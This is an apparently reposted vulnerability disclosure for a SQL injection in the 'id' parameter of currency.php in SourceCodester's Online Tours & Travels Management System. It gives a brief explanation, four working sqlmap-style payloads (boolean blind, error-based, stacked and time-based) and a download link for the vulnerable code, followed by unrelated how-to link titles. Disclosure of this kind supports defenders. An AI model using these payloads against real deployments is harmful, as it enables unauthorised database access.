SourceCodester Online Tours 和amp; Travels Management System currency.php sql injection

@sec

2024-04-24 帮助1人

SourceCodester Online Tours & Travels Management System currency.php sql injection

Url: admin/operations/currency.php

Abstract:

Line 44 of currency.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

Data enters a program from an untrusted source.
The data is used to dynamically construct a SQL query.

In this case, the data is passed to exec() in currency.php on line 44.

学新通

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: id=111' AND 9192=(SELECT (CASE WHEN (9192=9192) THEN 9192 ELSE (SELECT 7773 UNION SELECT 6688) END))-- -

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=111' AND GTID_SUBSET(CONCAT(0x7171767671,(SELECT (ELT(7846=7846,1))),0x71767a7671),7846)-- FmDU

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=111';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
    Payload: id=111' AND 8032=BENCHMARK(5000000,MD5(0x54465361))-- fyPR

Download Code:
https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

这篇好文章是转载于：学新通技术网

SourceCodester Online Tours 和amp; Travels Management System currency.php sql injection

photoshop保存的图片太大微信发不了怎么办

Android 11 保存文件到外部存储，并分享文件

word里面弄一个表格后上面的标题会跑到下面怎么办

《学习通》视频自动暂停处理方法

photoshop扩展功能面板显示灰色怎么办

微信公众号没有声音提示怎么办

excel下划线不显示怎么办

excel打印预览压线压字怎么办

怎样阻止微信小程序自动打开

TikTok加速器哪个好免费的TK加速器推荐